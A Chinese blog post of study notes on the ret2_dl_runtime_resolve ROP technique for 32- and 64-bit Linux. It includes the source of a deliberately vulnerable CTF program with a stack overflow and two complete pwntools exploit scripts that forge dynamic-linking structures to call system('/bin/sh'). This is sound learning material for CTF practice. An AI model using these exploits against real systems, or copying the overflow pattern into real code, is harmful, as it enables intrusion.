ret2_dl_runtime_resolve学习

已于 2022-09-23 22:09:28 修改
阅读量326 收藏
点赞数
分类专栏: PWN 文章标签: 学习
于 2022-09-23 21:11:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127017986
版权

ret2_dl_runtime_resolve:

以下为个人总结,如有错误,还望看官指出

一种复杂的rop利用技术,但利用方式单一,模板化

适用场景:

NX和ASLR保护开启,简单栈溢出同时难以泄露更多信息

32位利用:

大致的讲一下,详细的利用步骤与细节可上网自行查询其他大佬

函数dl_runtime_resolve(link_map_obj,reloc_index)有这两个参数

调用dl_runtime_resolve要摆好这两个参数

link_map_obj的值可以pwntools获取:elf.get_section_by_name(‘.plt’).header.sh_addr

而reloc_index参数和rop的要求:

1. reloc_index就是rel.plt的偏移,我们要改为指向bss段我们伪造的rel.plt结构{r_offest,r_info}

2. r_info>>8就是.dynsym的偏移,我们要改为指向bss段我们伪造的

dynsym结构{st_name,st_value,st_size ,st_info}

3. st_name就是.dynstr的偏移,我们要改为指向bss段我们伪造的字符串(可以为system\x00)

注: 我们要算出偏移都是要知道 对应表的基址 与 我们fake_struck地址 相应运算一下

基址都可以pwntools获取

还有就是fake_dynsym_struck要地址对齐

例题:xdctf2015_pwn200(Partial RELRO)

源码:

#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln()
{
	char buf[100];
	setbuf(stdin, buf);
	read(0, buf, 256);
}
int main()
{
	char buf[100] = "Welcome to XDCTF2015~!\n";

	setbuf(stdout, buf);
	write(1, buf, strlen(buf));
	vuln();
	return 0;

}

编译一下

gcc -fno-stack-protector -m32 -z relro -no-pie pwn.c -o main

exp:

from pwn import *
offset = 112
elf = ELF('./bof')
io = process('./bof')
rop = ROP('./bof')
bss_addr = elf.bss()
stack_size = 0x800
base_stage = bss_addr + stack_size
rop.raw('a'*offset)
rop.read(0, base_stage, 100)
rop.migrate(base_stage)
#gdb.attach(io)
io.sendline(rop.chain())

rop = ROP('./bof')

plt0 = elf.get_section_by_name('.plt').header.sh_addr
rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr
dynsym = elf.get_section_by_name('.dynsym').header.sh_addr
dynstr = elf.get_section_by_name('.dynstr').header.sh_addr

fake_sym_addr = base_stage + 32
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr += align

index_dynsym = (fake_sym_addr - dynsym)/0x10
st_name = fake_sym_addr + 0x10 - dynstr
fake_sys = flat([st_name, 0, 0, 0x12])
index_offset = base_stage + 24 - rel_plt
read_got = elf.got['read']
r_info = index_dynsym << 8 | 0x7
fake_sys_rel = flat([read_got, r_info])
sh = '/bin/sh'
rop.raw(plt0)
rop.raw(index_offset)
rop.raw('bbbb')
rop.raw(base_stage+82)
rop.raw('bbbb')
rop.raw('bbbb')

rop.raw(fake_sys_rel)
rop.raw(align * 'a')
rop.raw(fake_sys)
rop.raw('system\x00')
rop.raw('a'*(80 - len(rop.chain())))
print len(rop.chain())
rop.raw(sh+'\x00')
rop.raw('a'*(100 - len(rop.chain())))
#gdb.attach(io)
#print(rop.dump())
io.sendline(rop.chain())
io.interactive()

64位利用:

64位与32位相比又有许多不同的地方,详细请参考网络上其他大佬

这里贴一位

ret2dlresolve超详细教程(x86&x64)_77Pray的博客-CSDN博客

(假设我们控制的地址在bss段)

64位的话要在bss段伪造Linkmap结构,控制:

  1. DT_JMPREL指针:位于link_map_addr +0xF8,它指向的结构第二个参数指向伪造的.rel.plt的地址
    我们要把它改为指向bss段我们伪造的结构,我们伪造结构的第二个参数指向bss段我们伪造的.rel.plt结构

  2. DT_SYMTAB指针:位于link_map_addr + 0x70,指向bss段我们伪造的dyn_symtab结构
    (DT_STRTAB指针:位于link_map_addr +0x68,但用不到)

  3. l_addr,位于link_map+0处,l_addr的值=libc.sym[‘system’] - libc.sym[‘w
    rite’] (system减去一个已经绑定过的plt表)

最后都布置好了的话rdi传入/bin/sh的地址,加载dlsolve,参数入栈(fake_linkmap_addr 和 (push) 0)

可以gdb调试看看push几,那个加载dlsolve的地址也能调试得到
请添加图片描述

例题1:xdctf2015_pwn200(Partial RELRO)

源码:

#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln()
{
	char buf[100];
	setbuf(stdin, buf);
	read(0, buf, 256);
}
int main()
{
	char buf[100] = "Welcome to XDCTF2015~!\n";

	setbuf(stdout, buf);
	write(1, buf, strlen(buf));
	vuln();
	return 0;

}

同样的题目编译一下,不过变为64位

gcc -fno-stack-protector -z relro -no-pie pwn.c -o main

exp:

from pwn import*
r=process('./main')
elf=ELF('./main')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(os='linux',arch='amd64',log_level='debug')
bss_addr = elf.bss()
stack_size = 0x400
bss_stage = bss_addr + stack_size
l_addr =  libc.sym['system'] -libc.sym['write']
print hex(l_addr)
pop_rdi=0x4007b3 #pop rdi ; ret
pop_rsi=0x4007b1 #pop rsi ; pop r15 ; ret
ret=0x400501#ret
dlsolve = 0x400516#gdb debug find

def fake_Linkmap_payload(fake_linkmap_addr,known_func_ptr,offset):
    linkmap = p64(offset & (2 ** 64 - 1))#l_addr
    #dyn_relplt
    linkmap += p64(0)
    linkmap += p64(fake_linkmap_addr + 0x18)
    #relplt
    linkmap += p64((fake_linkmap_addr + 0x30 - offset) & (2 ** 64 - 1))
    linkmap += p64(0x7)
    linkmap += p64(0)

    linkmap += p64(0)#l_ns
    #dyn_symtab
    linkmap += p64(0)
    linkmap += p64(known_func_ptr - 0x8)
    
    linkmap += b'/bin/sh\x00'
    
    linkmap = linkmap.ljust(0x68,b'A')
    linkmap += p64(fake_linkmap_addr)#fake_linkmap+0x68
    linkmap += p64(fake_linkmap_addr + 0x38)#fake_linkmap+0x70
    linkmap = linkmap.ljust(0xf8,b'A')
    linkmap += p64(fake_linkmap_addr + 0x8)#fake_linkmap+0xf8
    return linkmap

fake_link_map = fake_Linkmap_payload(bss_stage, elf.got['write'] ,l_addr)
payload = flat( 'a' * 120 ,pop_rdi, 0 , pop_rsi , bss_stage , 0 ,elf.plt['read'],
        ret, ret,ret,ret,
        pop_rdi , bss_stage + 0x48  , dlsolve , bss_stage , 0
)
r.recvuntil('Welcome to XDCTF2015~!\n')
r.send(payload)
r.sendline(fake_link_map)
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细解析ret2_dl_runtime_resolve
qq_36495104的博客
05-11 952
先放几个学习的链接 CTF-wiki 高级ROP ret2dl_runtime 之通杀详解 聊聊动态链接和dl_runtime_resolve ELF的学习参考 程序员的自我修养 看了上面的以及一些没有放出来的仍然没有很好地理解这个攻击技巧 延迟绑定 这里直接贴程序员的自我修养书上的内容,延迟绑定看这就够了。 延迟绑定实现 动态链接相关结构 .dynamic段 ELF里专门用于动态链接的段还有几个,首先是.dynamic段。这个段里保存了动态链接器所需的基本信息,比如依赖于哪些共享对象,动态链
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve
weixin_44145820的博客
04-19 1626
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
好好说话之ret2_dl_runtime_resolve
hollk’s blog
07-21 2791
当初毕业论文就写了一万五千字,没想到一篇ret2_dl_runtime_resolve博客三万两千字~~我吐了~~ 。由于内容比较详细,无法避免有些知识点会忘记,可以通过目录翻阅忘记的内容 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
ROP高级用法之ret2_dl_runtime_resolve
热门推荐
钞sir的博客
04-29 1万+
简介 程序想要调用其他动态链接库的函数,必须要在程序加载的时候动态链接;在一个程序运行过程中,可能很多函数在程序执行完时都不会用到,比如一些错误处理函数或者一些用户很少用到的功能模块;所以ELF采用一种叫做延迟绑定(Lazy Binding)的做法,基本思想就是当函数第一次被用到的时候才进行绑定(符号查找、重定位等); 而在linux 中是利用_dl_runtime_resolve(link_ma...
高级ret2_dl_runtime_resolve
Jc
07-02 563
Ret2dl 准备: readelf工具的使用 -h 显示文件的头部信息 -l(program headers),segments 显示程序头(段头)信息(如果有数据的话)。 -S(section headers),sections 显示节头信息(如果有数据的话)(区分大小写) -g(section groups),显示节组信息(如果有数据的话) -t,section-details 显示节的...
_dl_runtime_resolve
farmwang的专栏
06-21 2095
_dl_runtime_resolve是怎么知要查找printf函数的_dl_runtime_resolve找到printf函数地址之后,它怎么知道回填到哪个GOT表项到底_dl_runtime_resolve是什么时候被写到GOT表的 前2个问题,只需要一个信息就可以了知道,这个信息就在藏在在函数对应的xxx@plt表中,以foo@plt为例: 0000000000400590 :
ret2dl_resolve解析1
08-08
在深入探讨`ret2dl_resolve解析1`这个主题之前,我们先来理解一些基础的ELF(Executable and Linking Format)文件格式和动态链接的概念。ELF是Unix系统及其变种,如Linux,广泛使用的可执行文件、共享库和核心转储...
ret2dl_runtime_resolve实例分析
Hello World.c
05-07 470
dl_runtime_resolve实例分析 IDA静态分析 这里用2019信安国赛的baby_pwn来做演示(就是因为这个做不出来去做了好多功课),实例程序test在文件夹下,hack.py是实现本地攻击的脚本 首先使用checksec查看文件保护状态,由于是partial relo所以并没机会改写动态段的字符串表地址。所以我们直接伪造所有所需要的参数结构。 ida动态段信息如下 d_ta...
ret2dlresolve学习(1)
F_Day_的博客
10-22 205
ret2dlresolve学习(1) ret2dlresolve主要是利用函数_dl_runtime_resolve来进行 这个函数是用来对动态链接函数进行重定位的 它最简单的利用就是直接修改重定位表项 构造一个存在栈溢出的例子 #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); ret
pwn学习总结(五) —— ret2dl_runtime_resolve(待补充)
qq_41988448的博客
03-23 430
pwn学习总结(十) —— ret2_dl_runtime_resolve一、程序示例二、Section信息.dynamic.dynstr.dymsym.rel.plt延迟绑定 一、程序示例 第一步:编译并运行以下代码 #include<stdio.h> int main() { char buf[]="Hello World!\n"; write(1, buf, strlen...
ret2_dl_runtime_resolve高级栈溢出利用思路
a2590035252的博客
10-17 956
推荐给想和我一样深入理解动态链接过程的pwn师傅
64位ret2dl_resolve
Kr0ne的博客
11-04 786
64位ret2dl_resolve一些个人理解 前言 在学32位ret2dl_resolve的时候就遗留了一个坑,64位该怎么搞。因为wiki上整个ELF的部分确实看上去很枯燥而且抓不住重点,就一直留到了现在,最近因为几个比赛题重新研究了一下。 概括 具体思路见参考文章,筛选的都是写的能让我看懂的了。对比模板发现思路都是一样的,这里只分析几个针对不同题目怎么改参数的问题以及坑点。 前置知识 通过阅读_dl_fixup源码可以总结出一般的函数重定向流程可简略如下: 通过struct link_map *l获
死活不懂ret2_dl_runtime_resolve,留着以后学
哒君的博客
07-27 349
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#ret2_dl_runtime_resolve https://bbs.pediy.com/thread-227034.htm https://xz.aliyun.com/t/5122#toc-10 https://www.freebuf.co...
ret2dl-runtime-resolve详细分析(32位&64位)
seaaseesa的博客
02-24 3429
Ret2dl-runtime-resolve技术 在linux下,二进制引用的外部符号加载方式有三种,FULL_RELRO、PARTIAL_RELRO、NO_RELRO,在PARTIAL_RELRO和NO_RELRO的情况下,外部符号的地址延迟加载,并且,在NO_RELRO下,ELF的dynamic段可读写。 ELF有plt表和got表,程序调用外部函数函数时,call的是plt表项,而plt...
_dl_runtime_resolve源码分析
conansonic的博客
01-23 7929
_dl_runtime_resolve 重定位、动态链接、静态连接、延迟绑定
glibc动态链接器dl_runtime_resolve简要分析
Hello World.c
05-05 3082
dl_runtime_resolve简要分析 资料 glibc 2.9 source linux elf 手册 &各种百度搜索 基于32位elf,64位一些结构会略有不同,新手学习,如果有理解错误,请师傅们帮忙指出。 elf执行时动态绑定简要分析 动态链接的过程 动态链接中起到核心作用的是got节和plt节,链接器为所有共享目标文件(shared object)中未定义的(undef)外部...
ret2dl_runtime_resolve(64位)
qq_45595732的博客
03-07 557
先把相关结构体和宏都列一下把(也懒得一个一个解释了) typedef struct { Elf64_Sxword d_tag; /* Dynamic entry type */ union { Elf64_Xword d_val; /* Integer value */ Elf64_Addr d_ptr; /* Address value */ } d_un; } Elf64_Dyn; typedef struct { Elf64_Word s
【pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3611
ret2dlreslove
__ret_warn_on
最新发布
05-30
`__ret_warn_on()` 是一个 Linux 内核中的宏定义。它用于在函数返回值为一个错误码时打印一条警告信息,提示开发者可能存在一些问题。 该宏的定义如下: ``` #define __ret_warn_on(cond, fmt, ...) \ ({ \ ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值